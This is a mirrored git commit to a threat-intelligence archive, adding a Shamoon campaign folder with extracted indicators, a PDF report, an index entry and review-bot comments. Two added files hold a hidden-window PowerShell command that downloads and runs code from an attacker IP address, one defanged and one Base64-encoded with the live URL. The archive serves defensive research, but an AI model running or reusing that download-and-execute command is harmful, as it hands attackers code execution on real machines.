mirror of
https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections
synced 2024-06-16 12:00:04 +00:00
2017.02.15.the-full-shamoon
parent f2c3e35ae3
commit 3bfb110042
1
2017/2017.02.15.the-full-shamoon/decode.txt
Normal file
@ -0,0 +1 @@
|
||||
PowerShell.exe -w hidden -noni -nop -c “iex(New-Object System.Net.WebClient).DownloadString(‘hxxp://139.59.46.154:3485/eiloShaegae1’)”
|
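Review bot: the added line in decode.txt is not a literal decode of the `-e` payload recorded in embedded_powershell.txt: it uses typographic quotes (“ ” and ‘ ’), a defanged `hxxp://` scheme and `PowerShell.exe` capitalisation, whereas that Base64 string decodes (as UTF-16LE) to ASCII quotes, `http://` and lowercase `powershell.exe`. A command-line match or signature built from this file would not match the command as it actually runs, so either store the exact decoded text with only the URL scheme defanged, or add a line saying the text was transcribed from the report and defanged.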
1
2017/2017.02.15.the-full-shamoon/embedded_powershell.txt
Normal file
@ -0,0 +1 @@
|
||||
PowerShell.exe -window hidden -e cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQB3ACAAaABpAGQAZABlAG4AIAAtAG4AbwBuAGkAIAAtAG4AbwBwACAALQBjACAAIgBpAGUAeAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADMAOQAuADUAOQAuADQANgAuADEANQA0ADoAMwA0ADgANQAvAGUAaQBsAG8AUwBoAGEAZQBnAGEAZQAxACcAKQAiAA==
|
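Review bot: embedded_powershell.txt is added as a bare one-line command with nothing recording where it was extracted from; the directory name is the only link to its source. Add a short header or a sibling note naming the document or sample that carried this command, and state that the `-e` argument is Base64 over UTF-16LE so the pairing with decode.txt can be checked. Unlike decode.txt, the encoded form still carries the URL undefanged, which is worth saying in that note.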
BIN
2017/2017.02.15.the-full-shamoon/the-full-shamoon-how-the-devastating-malware-was-inserted-into-networks.pdf
Normal file
Binary file not shown.
@ -16,6 +16,7 @@ Please fire issue to me if any lost of APT/Malware events/campaigns.
|
||||
* Feb 20 - [Lazarus' False Flag Malware](http://baesystemsai.blogspot.tw/2017/02/lazarus-false-flag-malware.html) | [Local](../../blob/master/2017/2017.02.20.Lazarus_False_Flag_Malware)
|
||||
* Feb 17 - [ChChes - Malware that Communicates with C&C Servers Using Cookie Headers](http://blog.jpcert.or.jp/2017/02/chches-malware--93d6.html) [Local](../../blob/master/2017/2017.02.17.chches-malware)
|
||||
* Feb 15 - [Deep Dive On The DragonOK Rambo Backdoor](http://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor) | [Local](../../blob/master/2017/2017.02.15.deep-dive-dragonok-rambo-backdoor)
|
||||
* Feb 15 - [The Full Shamoon: How the Devastating Malware Was Inserted Into Networks](https://securityintelligence.com/the-full-shamoon-how-the-devastating-malware-was-inserted-into-networks/) | [Local](../../blob/master/2017/2017.02.15.the-full-shamoon)
|
||||
* Feb 14 - [Operation Kingphish: Uncovering a Campaign of Cyber Attacks against Civil Society in Qatar and Nepal](https://medium.com/amnesty-insights/operation-kingphish-uncovering-a-campaign-of-cyber-attacks-against-civil-society-in-qatar-and-aa40c9e08852#.cly4mg1g8) | [Local](../../blob/master/2017/2017.02.14.Operation_Kingphish)
|
||||
* Feb 10 - [Enhanced Analysis of GRIZZLY STEPPE Activity](https://www.us-cert.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf) | [Local](../../blob/master/2017/2017.02.10.Enhanced_Analysis_of_GRIZZLY_STEPPE)
|
||||
* Feb 02 - [Oops, they did it again: APT Targets Russia and Belarus with ZeroT and PlugX](https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx) | [Local](../../blob/master/2017/2017.02.02.APT_Targets_Russia_and_Belarus_with_ZeroT_and_PlugX)
|
||||
|
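Review bot: the Feb 17 ChChes line, two entries above the new Feb 15 Shamoon entry, is missing the ` | ` separator before `[Local]` that every other entry in this hunk uses, the added one included. Since this change touches the same list, fix that line here so the entries render consistently.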